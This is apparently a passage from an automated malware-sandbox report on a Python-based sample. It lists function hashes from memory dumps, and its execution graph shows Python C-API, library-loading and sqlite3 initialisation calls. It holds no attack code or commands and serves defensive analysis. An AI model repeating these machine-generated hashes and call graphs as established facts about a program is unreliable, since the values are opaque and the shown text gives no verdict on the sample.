                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3402d2e0ca04d9e07d2e45f8394c209145bce56193131355fdc1db6069930af
                                                            • Instruction ID: 481338d9288b40880291a7dfd61cbdccb7edb2c9925cabcec73dec01687f91f9
                                                            • Opcode Fuzzy Hash: d3402d2e0ca04d9e07d2e45f8394c209145bce56193131355fdc1db6069930af
                                                            • Instruction Fuzzy Hash: C2317C71A0860D8FEF95EB78C9486ED77F1FF48311F1440BAE409E72A2DE38A8418B51
                                                            Function 00007FFB4B382275 Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 363e10278b2f499d7e1a68903ea7a7b160c5776e913e4b9501bbed3bbccccaa7
                                                            • Instruction ID: 8a301a7856aa4ff5ad33c9485ef5ddc9b1d06d2384e24a337764f02fb24e7158
                                                            • Opcode Fuzzy Hash: 363e10278b2f499d7e1a68903ea7a7b160c5776e913e4b9501bbed3bbccccaa7
                                                            • Instruction Fuzzy Hash: 5A31937090C6498FDB81EF74C855AA9BBF1FF59300F0481FAD149C72A2CA7CA945CB52
                                                            Function 00007FFB4B382F75 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3385199c4cdb3b40d9f3c6f759f4ef922ef1121704eb278ba1f200d79ef6426
                                                            • Instruction ID: 36284409e0bf9511e897f46619c7c26aedda660d84a3c0a3d219600135293a49
                                                            • Opcode Fuzzy Hash: f3385199c4cdb3b40d9f3c6f759f4ef922ef1121704eb278ba1f200d79ef6426
                                                            • Instruction Fuzzy Hash: 741154C2A1DD8A0FFB95EA3DD8A55B8ABC1FF9421474443FAD409C71D7DD0868068381
                                                            Function 00007FFB4B382189 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e02194f4a8d3b0d28b67365d4d9db068118b907b6b2d83fb0ed7fc44054cf01b
                                                            • Instruction ID: dfd787ed64ce07e7035387295d5fb287cb477e479670907dd56584bfbb00e398
                                                            • Opcode Fuzzy Hash: e02194f4a8d3b0d28b67365d4d9db068118b907b6b2d83fb0ed7fc44054cf01b
                                                            • Instruction Fuzzy Hash: 0321B1B1E185598FEF85EBB8C8056ED7BE0EF54300F0441F6E518D71A2DA38A9448B81
                                                            Function 00007FFB4B382F90 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5219ac94bf64dd6363e91da66d2dfd55f716ef9a8789d89d743fdcb368eb7f4d
                                                            • Instruction ID: a1412cd2cf343dc349a9e44513878ceac4c3e3f8fb23b8903f94a144901d1ac2
                                                            • Opcode Fuzzy Hash: 5219ac94bf64dd6363e91da66d2dfd55f716ef9a8789d89d743fdcb368eb7f4d
                                                            • Instruction Fuzzy Hash: 691127D2B1DC8A0BFB95E63DD8955B9A7C2EF9826574043BAD40DC31D6DC1468468380
                                                            Function 00007FFB4B3827E2 Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 30e814377e414763a7355aac1e76f83ff9bd707a131a2fdc3dc71cf81d6970eb
                                                            • Instruction ID: 6103f3ab82a52cd8af368aab94d5beb8b501bb609407cd5da1541509bcafa6c2
                                                            • Opcode Fuzzy Hash: 30e814377e414763a7355aac1e76f83ff9bd707a131a2fdc3dc71cf81d6970eb
                                                            • Instruction Fuzzy Hash: 672148B4A1990E8FEF81EB68C855AB977E1FF48301F004075E90DD3692DE24E8408B41
                                                            Function 00007FFB4B382ED5 Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b8be8baa65d4bd1ec8ef038c65f58035273c58826a47a17d4d400ab413dadd0
                                                            • Instruction ID: 30a85fd171882dac79880db76d24bcd1d108785d18dab763639ace2778b589fd
                                                            • Opcode Fuzzy Hash: 5b8be8baa65d4bd1ec8ef038c65f58035273c58826a47a17d4d400ab413dadd0
                                                            • Instruction Fuzzy Hash: F911BEC290E7C50FEB13AB798D750A43FA0EF57200B4981EBD5C88B0E7D818591AC3A3
                                                            Function 00007FFB4B382971 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2e11ab7b22b124a65ec59d42085ecdbf611af21aa1b80da96061f6b70565af6
                                                            • Instruction ID: d96888d26406864a34dca4a5fd0aa3cf42f6a9cbe749491023db0c4de879071f
                                                            • Opcode Fuzzy Hash: d2e11ab7b22b124a65ec59d42085ecdbf611af21aa1b80da96061f6b70565af6
                                                            • Instruction Fuzzy Hash: 9BF0B46560D9994FEB95F73C88291787AD1EF99200B0440EAD14DD71E3DE0898045792
                                                            Function 00007FFB4B38201E Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2aaa43703d45d2e0556ca00e9e3aedc273deff9a0863f5dfb4d93a49c584f16b
                                                            • Instruction ID: 2b7edebba680b4cde1543f0c7e2d35e0195b922cf527d28c9884ff7b29db909b
                                                            • Opcode Fuzzy Hash: 2aaa43703d45d2e0556ca00e9e3aedc273deff9a0863f5dfb4d93a49c584f16b
                                                            • Instruction Fuzzy Hash: 03F0F4D2918D4A4AFE82FF35C8511EAAAD1EF88340F5080A8D54EC3196DE38A5028683
                                                            Function 00007FFB4B3828D1 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a00b38a356dd01d5442ef31ca0f274b44d92d1e87284b9b53355c37b505b2a3
                                                            • Instruction ID: f93b44a9acf8228361a852f71ad920d880938faada3fbf6de4a107f51a9e0d4e
                                                            • Opcode Fuzzy Hash: 5a00b38a356dd01d5442ef31ca0f274b44d92d1e87284b9b53355c37b505b2a3
                                                            • Instruction Fuzzy Hash: 61F054C2D0D7D50FEB557A39DCA61A43FD1DF55510B4602EBD144C64E3E90C6C424353
                                                            Function 00007FFB4B383031 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d1b3c33f8ab5527b482985328c69c22e6c76ab716c4414cb22fc493412cfc3e
                                                            • Instruction ID: fcf49c5f929ff5b2a603e1c2e685ea0ba000ff25fa789a922f613f4de542ead3
                                                            • Opcode Fuzzy Hash: 5d1b3c33f8ab5527b482985328c69c22e6c76ab716c4414cb22fc493412cfc3e
                                                            • Instruction Fuzzy Hash: 88E0206180D7D10FE773A77890914E27FB0DF07110B0500EBE5C5CA097F8599987C382

                                                            Non-executed Functions

                                                            Function 00007FFB4B3804F0 Relevance: 7.6, Strings: 6, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1540673808.00007FFB4B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B380000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_7ffb4b380000_main.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ]'K$0]'K$@]'K$P]'K$`]'K$p]'K
                                                            • API String ID: 0-4092897891
                                                            • Opcode ID: 6c23dd3f7b057529a0359ed3afc768d49dd30a3a09e293ce01333b7eb8082c88
                                                            • Instruction ID: 684d53fcda6ab4a264064d3c90795ad449de6e831e18f9393b204661622a373f
                                                            • Opcode Fuzzy Hash: 6c23dd3f7b057529a0359ed3afc768d49dd30a3a09e293ce01333b7eb8082c88
                                                            • Instruction Fuzzy Hash: 9A21BAC360FAC30FE3559AFC6C095359FD1EBD1290B5981FBE184860EB94A49E0943E6

                                                            Execution Graph

                                                            Execution Coverage:0.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:365
                                                            Total number of Limit Nodes:14
                                                            execution_graph 93441 7ffba48586b0 93442 7ffba48586d8 PyModule_Create2 93441->93442 93443 7ffba48586ca 93441->93443 93444 7ffba48587d0 93442->93444 93445 7ffba48586fa PyObject_GetAttrString PyModule_GetDict 93442->93445 93446 7ffba48587e4 93444->93446 93448 7ffba48587db _Py_Dealloc 93444->93448 93447 7ffba48587ae 93445->93447 93454 7ffba485872a 93445->93454 93449 7ffba4858803 93446->93449 93450 7ffba48587fd _Py_Dealloc 93446->93450 93447->93444 93453 7ffba48587c7 _Py_Dealloc 93447->93453 93448->93446 93451 7ffba4858822 93449->93451 93455 7ffba485881c _Py_Dealloc 93449->93455 93450->93449 93457 7ffba4858841 93451->93457 93459 7ffba485883b _Py_Dealloc 93451->93459 93453->93444 93454->93447 93474 7ffba4860960 93454->93474 93455->93451 93456 7ffba4858789 93456->93447 93458 7ffba485878d 93456->93458 93460 7ffba4858860 93457->93460 93463 7ffba485885a _Py_Dealloc 93457->93463 93461 7ffba485879c 93458->93461 93462 7ffba4858793 _Py_Dealloc 93458->93462 93459->93457 93464 7ffba485887f 93460->93464 93465 7ffba4858879 _Py_Dealloc 93460->93465 93462->93461 93463->93460 93466 7ffba485889e 93464->93466 93467 7ffba4858898 _Py_Dealloc 93464->93467 93465->93464 93468 7ffba48588b7 _Py_Dealloc 93466->93468 93470 7ffba48588bd 93466->93470 93467->93466 93468->93470 93469 7ffba48588dc 93472 7ffba48588fb 93469->93472 93473 7ffba48588f5 _Py_Dealloc 93469->93473 93470->93469 93471 7ffba48588d6 _Py_Dealloc 93470->93471 93471->93469 93473->93472 93475 7ffba48609af 93474->93475 93476 7ffba4860979 PyImport_Import 93474->93476 93682 7ffba48545f0 PyImport_ImportModuleLevelObject 93475->93682 93478 7ffba4860997 93476->93478 93681 7ffba486098e 93476->93681 93478->93475 93480 7ffba48609a9 _Py_Dealloc 93478->93480 93480->93475 93481 7ffba48609ef _Py_Dealloc 93482 7ffba48609f5 93481->93482 93483 7ffba48545f0 15 API calls 93482->93483 93484 7ffba4860a12 93483->93484 93485 7ffba4860a3b 93484->93485 93486 7ffba4860a35 _Py_Dealloc 93484->93486 93484->93681 93487 7ffba48545f0 15 API calls 93485->93487 93486->93485 93488 7ffba4860a58 93487->93488 93489 7ffba4860a81 93488->93489 93490 7ffba4860a7b _Py_Dealloc 93488->93490 93488->93681 93491 7ffba48545f0 15 API calls 93489->93491 93490->93489 93492 7ffba4860a9e 93491->93492 93493 7ffba4860ac1 _Py_Dealloc 93492->93493 93494 7ffba4860ac7 93492->93494 93492->93681 93493->93494 93495 7ffba48545f0 15 API calls 93494->93495 93496 7ffba4860ae4 93495->93496 93497 7ffba4860b0d 93496->93497 93498 7ffba4860b07 _Py_Dealloc 93496->93498 93496->93681 93499 7ffba4860b35 PyTuple_Pack 93497->93499 93497->93681 93498->93497 93500 7ffba4860ba8 93499->93500 93501 7ffba4860b84 PyObject_SetAttr 93499->93501 93698 7ffba4851320 _Py_Dealloc 93500->93698 93502 7ffba4860b9b _Py_Dealloc 93501->93502 93503 7ffba4860ba4 93501->93503 93502->93503 93503->93500 93504 7ffba4860bd4 93503->93504 93506 7ffba4860bfc PyDict_SetItem 93504->93506 93507 7ffba4860c04 PyObject_SetItem 93504->93507 93509 7ffba4860c0a 93506->93509 93507->93509 93508 7ffba4860bc9 93508->93456 93510 7ffba4860c12 _Py_Dealloc 93509->93510 93511 7ffba4860c1b 93509->93511 93510->93511 93512 7ffba4860c23 PyTuple_Pack 93511->93512 93511->93681 93513 7ffba4860c48 93512->93513 93512->93681 93514 7ffba4860c70 93513->93514 93515 7ffba4860c67 _Py_Dealloc 93513->93515 93516 7ffba4860c75 PyTuple_Pack 93514->93516 93514->93681 93515->93514 93517 7ffba4860d42 93516->93517 93518 7ffba4860d1e PyObject_SetAttr 93516->93518 93699 7ffba4851320 _Py_Dealloc 93517->93699 93519 7ffba4860d3e 93518->93519 93520 7ffba4860d35 _Py_Dealloc 93518->93520 93519->93517 93521 7ffba4860d6e 93519->93521 93520->93519 93522 7ffba4860d9e PyObject_SetItem 93521->93522 93523 7ffba4860d96 PyDict_SetItem 93521->93523 93526 7ffba4860da4 93522->93526 93523->93526 93525 7ffba4860d63 93525->93456 93527 7ffba4860dac _Py_Dealloc 93526->93527 93528 7ffba4860db5 93526->93528 93527->93528 93529 7ffba4860dbd PyTuple_Pack 93528->93529 93528->93681 93530 7ffba4860de2 93529->93530 93529->93681 93531 7ffba4860e01 _Py_Dealloc 93530->93531 93532 7ffba4860e0a 93530->93532 93531->93532 93533 7ffba4860e0f PyTuple_Pack 93532->93533 93532->93681 93534 7ffba4860ebd 93533->93534 93535 7ffba4860e99 PyObject_SetAttr 93533->93535 93700 7ffba4851320 _Py_Dealloc 93534->93700 93536 7ffba4860eb0 _Py_Dealloc 93535->93536 93537 7ffba4860eb9 93535->93537 93536->93537 93537->93534 93538 7ffba4860ee9 93537->93538 93540 7ffba4860f11 PyDict_SetItem 93538->93540 93541 7ffba4860f19 PyObject_SetItem 93538->93541 93543 7ffba4860f1f 93540->93543 93541->93543 93542 7ffba4860ede 93542->93456 93544 7ffba4860f30 93543->93544 93545 7ffba4860f27 _Py_Dealloc 93543->93545 93546 7ffba4860f38 PyTuple_Pack 93544->93546 93544->93681 93545->93544 93547 7ffba4860f5d 93546->93547 93546->93681 93548 7ffba4860f7c _Py_Dealloc 93547->93548 93549 7ffba4860f85 93547->93549 93548->93549 93550 7ffba4860f8a PyTuple_Pack 93549->93550 93549->93681 93551 7ffba4861038 93550->93551 93552 7ffba4861014 PyObject_SetAttr 93550->93552 93701 7ffba4851320 _Py_Dealloc 93551->93701 93553 7ffba486102b _Py_Dealloc 93552->93553 93554 7ffba4861034 93552->93554 93553->93554 93554->93551 93555 7ffba4861064 93554->93555 93557 7ffba486108c PyDict_SetItem 93555->93557 93558 7ffba4861094 PyObject_SetItem 93555->93558 93559 7ffba486109a 93557->93559 93558->93559 93561 7ffba48610a2 _Py_Dealloc 93559->93561 93562 7ffba48610ab 93559->93562 93560 7ffba4861059 93560->93456 93561->93562 93563 7ffba48610b3 PyTuple_Pack 93562->93563 93562->93681 93564 7ffba48610d8 93563->93564 93563->93681 93565 7ffba4861100 93564->93565 93566 7ffba48610f7 _Py_Dealloc 93564->93566 93567 7ffba4861105 PyTuple_Pack 93565->93567 93565->93681 93566->93565 93568 7ffba48611ba 93567->93568 93569 7ffba4861196 PyObject_SetAttr 93567->93569 93702 7ffba4851320 _Py_Dealloc 93568->93702 93570 7ffba48611ad _Py_Dealloc 93569->93570 93571 7ffba48611b6 93569->93571 93570->93571 93571->93568 93572 7ffba48611e6 93571->93572 93574 7ffba486120e PyDict_SetItem 93572->93574 93575 7ffba4861216 PyObject_SetItem 93572->93575 93577 7ffba486121c 93574->93577 93575->93577 93576 7ffba48611db 93576->93456 93578 7ffba486122d 93577->93578 93579 7ffba4861224 _Py_Dealloc 93577->93579 93580 7ffba4861235 PyTuple_Pack 93578->93580 93578->93681 93579->93578 93581 7ffba486125a 93580->93581 93580->93681 93582 7ffba4861282 93581->93582 93583 7ffba4861279 _Py_Dealloc 93581->93583 93584 7ffba4861287 PyTuple_Pack 93582->93584 93582->93681 93583->93582 93585 7ffba486133c 93584->93585 93586 7ffba4861318 PyObject_SetAttr 93584->93586 93703 7ffba4851320 _Py_Dealloc 93585->93703 93587 7ffba486132f _Py_Dealloc 93586->93587 93588 7ffba4861338 93586->93588 93587->93588 93588->93585 93589 7ffba4861368 93588->93589 93591 7ffba4861390 PyDict_SetItem 93589->93591 93592 7ffba4861398 PyObject_SetItem 93589->93592 93594 7ffba486139e 93591->93594 93592->93594 93593 7ffba486135d 93593->93456 93595 7ffba48613af 93594->93595 93596 7ffba48613a6 _Py_Dealloc 93594->93596 93597 7ffba48613b7 PyTuple_Pack 93595->93597 93595->93681 93596->93595 93598 7ffba48613dc 93597->93598 93597->93681 93599 7ffba48613fb _Py_Dealloc 93598->93599 93600 7ffba4861404 93598->93600 93599->93600 93601 7ffba4861409 PyTuple_Pack 93600->93601 93600->93681 93602 7ffba48614e2 PyObject_SetAttr 93601->93602 93603 7ffba4861506 93601->93603 93604 7ffba4861502 93602->93604 93605 7ffba48614f9 _Py_Dealloc 93602->93605 93704 7ffba4851320 _Py_Dealloc 93603->93704 93604->93603 93606 7ffba4861532 93604->93606 93605->93604 93607 7ffba4861562 PyObject_SetItem 93606->93607 93608 7ffba486155a PyDict_SetItem 93606->93608 93610 7ffba4861568 93607->93610 93608->93610 93612 7ffba4861570 _Py_Dealloc 93610->93612 93613 7ffba4861579 93610->93613 93611 7ffba4861527 93611->93456 93612->93613 93614 7ffba4861581 PyTuple_Pack 93613->93614 93613->93681 93615 7ffba48615a6 93614->93615 93614->93681 93616 7ffba48615ce 93615->93616 93617 7ffba48615c5 _Py_Dealloc 93615->93617 93618 7ffba48615d3 PyTuple_Pack 93616->93618 93616->93681 93617->93616 93619 7ffba4861681 93618->93619 93620 7ffba486165d PyObject_SetAttr 93618->93620 93705 7ffba4851320 _Py_Dealloc 93619->93705 93621 7ffba486167d 93620->93621 93622 7ffba4861674 _Py_Dealloc 93620->93622 93621->93619 93623 7ffba48616ad 93621->93623 93622->93621 93625 7ffba48616dd PyObject_SetItem 93623->93625 93626 7ffba48616d5 PyDict_SetItem 93623->93626 93628 7ffba48616e3 93625->93628 93626->93628 93627 7ffba48616a2 93627->93456 93629 7ffba48616eb _Py_Dealloc 93628->93629 93630 7ffba48616f4 93628->93630 93629->93630 93631 7ffba48616fc PyTuple_Pack 93630->93631 93630->93681 93632 7ffba4861721 93631->93632 93631->93681 93633 7ffba4861740 _Py_Dealloc 93632->93633 93634 7ffba4861749 93632->93634 93633->93634 93635 7ffba486174e PyTuple_Pack 93634->93635 93634->93681 93636 7ffba486180f PyObject_SetAttr 93635->93636 93637 7ffba4861833 93635->93637 93638 7ffba486182f 93636->93638 93639 7ffba4861826 _Py_Dealloc 93636->93639 93706 7ffba4851320 _Py_Dealloc 93637->93706 93638->93637 93640 7ffba486185f 93638->93640 93639->93638 93642 7ffba486188f PyObject_SetItem 93640->93642 93643 7ffba4861887 PyDict_SetItem 93640->93643 93645 7ffba4861895 93642->93645 93643->93645 93644 7ffba4861854 93644->93456 93646 7ffba486189d _Py_Dealloc 93645->93646 93647 7ffba48618a6 93645->93647 93646->93647 93648 7ffba48618ef PyObject_Vectorcall 93647->93648 93649 7ffba4861967 93647->93649 93647->93681 93650 7ffba4861922 _Py_Dealloc 93648->93650 93651 7ffba486192b 93648->93651 93707 7ffba4851320 _Py_Dealloc 93649->93707 93650->93651 93651->93649 93652 7ffba4861930 PyObject_Vectorcall 93651->93652 93654 7ffba4861962 93652->93654 93655 7ffba4861959 _Py_Dealloc 93652->93655 93654->93649 93657 7ffba4861993 93654->93657 93655->93654 93656 7ffba4861988 93656->93456 93658 7ffba48619a2 93657->93658 93659 7ffba4861999 _Py_Dealloc 93657->93659 93660 7ffba48619c0 PyDict_SetItem 93658->93660 93661 7ffba48619c8 PyObject_SetItem 93658->93661 93659->93658 93662 7ffba48619ce 93660->93662 93661->93662 93663 7ffba48619d6 _Py_Dealloc 93662->93663 93664 7ffba48619df 93662->93664 93663->93664 93665 7ffba4861a21 PyObject_Vectorcall 93664->93665 93666 7ffba4861a99 93664->93666 93664->93681 93667 7ffba4861a5d 93665->93667 93668 7ffba4861a54 _Py_Dealloc 93665->93668 93708 7ffba4851320 _Py_Dealloc 93666->93708 93667->93666 93669 7ffba4861a62 PyObject_Vectorcall 93667->93669 93668->93667 93670 7ffba4861a8b _Py_Dealloc 93669->93670 93671 7ffba4861a94 93669->93671 93670->93671 93671->93666 93673 7ffba4861ac5 93671->93673 93675 7ffba4861acb _Py_Dealloc 93673->93675 93676 7ffba4861ad4 93673->93676 93674 7ffba4861aba 93674->93456 93675->93676 93677 7ffba4861af2 PyDict_SetItem 93676->93677 93678 7ffba4861afa PyObject_SetItem 93676->93678 93679 7ffba4861b00 93677->93679 93678->93679 93680 7ffba4861b08 _Py_Dealloc 93679->93680 93679->93681 93680->93681 93681->93456 93683 7ffba4854792 93682->93683 93684 7ffba4854633 93682->93684 93683->93481 93683->93482 93683->93681 93684->93683 93685 7ffba4854660 PyObject_GetAttr 93684->93685 93687 7ffba48546e0 PyObject_SetItem 93684->93687 93688 7ffba48546d8 PyDict_SetItem 93684->93688 93690 7ffba4854721 PyErr_Clear PyModule_GetFilenameObject PyUnicode_FromFormat PyErr_SetImportError 93684->93690 93694 7ffba48546ee _Py_Dealloc 93684->93694 93696 7ffba4854783 93684->93696 93685->93684 93686 7ffba485467b PyUnicode_FromFormat 93685->93686 93689 7ffba485469f PyObject_GetItem 93686->93689 93686->93690 93687->93684 93688->93684 93689->93684 93693 7ffba48546b4 _Py_Dealloc 93689->93693 93691 7ffba485476b _Py_Dealloc 93690->93691 93692 7ffba4854774 93690->93692 93691->93692 93695 7ffba485477a _Py_Dealloc 93692->93695 93692->93696 93693->93684 93694->93684 93695->93696 93696->93683 93697 7ffba4854789 _Py_Dealloc 93696->93697 93697->93683 93698->93508 93699->93525 93700->93542 93701->93560 93702->93576 93703->93593 93704->93611 93705->93627 93706->93644 93707->93656 93708->93674 93709 7ffba4568fa0 93718 7ffba4568c80 93709->93718 93712 7ffba4568fcb _PyObject_New 93713 7ffba4568fe0 FreeLibrary 93712->93713 93714 7ffba4568feb _strdup 93712->93714 93715 7ffba4569005 93713->93715 93714->93715 93716 7ffba456901b 93715->93716 93717 7ffba4569015 _Py_Dealloc 93715->93717 93717->93716 93719 7ffba4568cd2 93718->93719 93720 7ffba4568f2b _PyArg_ParseTuple_SizeT 93718->93720 93719->93720 93722 7ffba4568ce3 93719->93722 93721 7ffba4568f44 93720->93721 93725 7ffba4568f26 93720->93725 93723 7ffba4568f52 PyErr_SetString 93721->93723 93724 7ffba4568e8f _PyArg_ParseTuple_SizeT 93722->93724 93733 7ffba4568d37 _PyArg_ParseTuple_SizeT 93722->93733 93723->93725 93724->93725 93727 7ffba4568eaf 93724->93727 93750 7ffba457add0 8 API calls 2 library calls 93725->93750 93728 7ffba4568ee1 93727->93728 93729 7ffba4568ec1 PyErr_Format 93727->93729 93731 7ffba4568eea PyErr_Format 93728->93731 93732 7ffba4568f03 PyUnicode_FromFormat PyUnicode_AsUTF8 93728->93732 93729->93725 93730 7ffba4568f77 93730->93712 93730->93715 93731->93725 93732->93725 93734 7ffba4568dd0 PyErr_Clear _PyArg_ParseTuple_SizeT 93733->93734 93735 7ffba4568d53 PyUnicode_AsUTF8 93733->93735 93734->93725 93736 7ffba4568e05 PyUnicode_AsUTF8 93734->93736 93735->93725 93737 7ffba4568d68 PyUnicode_GetLength 93735->93737 93738 7ffba4568e1a PyMem_Free 93736->93738 93739 7ffba4568e25 93736->93739 93740 7ffba4568d87 93737->93740 93738->93725 93739->93723 93741 7ffba4568e2e LoadLibraryA PyMem_Free 93739->93741 93742 7ffba4568d9d PyUnicode_AsWideChar 93740->93742 93743 7ffba4568e41 93741->93743 93742->93725 93744 7ffba4568dbe LoadLibraryW 93742->93744 93743->93725 93745 7ffba4568e4a GetLastError 93743->93745 93744->93743 93746 7ffba4568e6d PyErr_Format 93745->93746 93747 7ffba4568e54 93745->93747 93746->93725 93749 7ffba45611a0 __stdio_common_vsprintf fprintf 93747->93749 93749->93746 93750->93730 93751 7ffba4568850 93752 7ffba4568862 93751->93752 93753 7ffba456886e free PyObject_Free 93751->93753 93752->93753 93754 7ffba4568868 FreeLibrary 93752->93754 93754->93753 93755 7ffba4718268 sqlite3_libversion_number 93756 7ffba471d416 93755->93756 93757 7ffba4718286 sqlite3_initialize 93755->93757 93758 7ffba471d42a PyErr_SetString 93756->93758 93759 7ffba471d41f sqlite3_errstr 93757->93759 93760 7ffba4718294 93757->93760 93771 7ffba47186df 93758->93771 93759->93758 93822 7ffba4718744 PyType_FromModuleAndSpec PyModule_GetState 93760->93822 93762 7ffba471829c 93763 7ffba4718736 sqlite3_shutdown 93762->93763 93823 7ffba471878c PyType_FromModuleAndSpec PyModule_GetState 93762->93823 93763->93771 93764 7ffba471d447 PyErr_Format 93764->93763 93766 7ffba47186ec PyModule_AddIntConstant 93766->93763 93766->93771 93767 7ffba47182ac 93767->93763 93824 7ffba47187d4 PyType_FromModuleAndSpec PyModule_GetState 93767->93824 93770 7ffba47182bc 93770->93763 93825 7ffba4718818 PyType_FromModuleAndSpec PyModule_GetState 93770->93825 93771->93763 93771->93764 93771->93766 93778 7ffba4718724 93771->93778 93830 7ffba47188ec PyModule_GetState PyDict_New PyModule_AddObjectRef 93771->93830 93831 7ffba4718934 PyModule_GetState PyDict_New PyModule_AddObjectRef 93771->93831 93832 7ffba47189f0 PyImport_ImportModule PyModule_GetState PyObject_GetAttrString _Py_Dealloc 93771->93832 93774 7ffba47182cc 93774->93763 93826 7ffba4718860 PyType_FromModuleAndSpec PyModule_GetState 93774->93826 93777 7ffba47182dc 93777->93763 93827 7ffba47188a8 PyType_FromModuleAndSpec PyModule_GetState 93777->93827 93780 7ffba47182ec 93780->93763 93781 7ffba47182f4 PyModule_GetState PyModule_AddType 93780->93781 93781->93763 93782 7ffba4718315 PyModule_AddType 93781->93782 93782->93763 93783 7ffba471832a PyModule_AddType 93782->93783 93783->93763 93784 7ffba4718342 PyModule_AddType 93783->93784 93784->93763 93785 7ffba471835a PyModule_AddType 93784->93785 93785->93763 93786 7ffba4718372 PyErr_NewException 93785->93786 93786->93763 93787 7ffba4718399 PyModule_AddType 93786->93787 93787->93763 93788 7ffba47183ad PyErr_NewException 93787->93788 93788->93763 93789 7ffba47183d4 PyModule_AddType 93788->93789 93789->93763 93790 7ffba47183e8 PyErr_NewException 93789->93790 93790->93763 93791 7ffba4718409 PyModule_AddType 93790->93791 93791->93763 93792 7ffba471841d PyErr_NewException 93791->93792 93792->93763 93793 7ffba471843e PyModule_AddType 93792->93793 93793->93763 93794 7ffba4718452 PyErr_NewException 93793->93794 93794->93763 93795 7ffba4718473 PyModule_AddType 93794->93795 93795->93763 93796 7ffba4718487 PyErr_NewException 93795->93796 93796->93763 93797 7ffba47184a8 PyModule_AddType 93796->93797 93797->93763 93798 7ffba47184bc PyErr_NewException 93797->93798 93798->93763 93799 7ffba47184dd PyModule_AddType 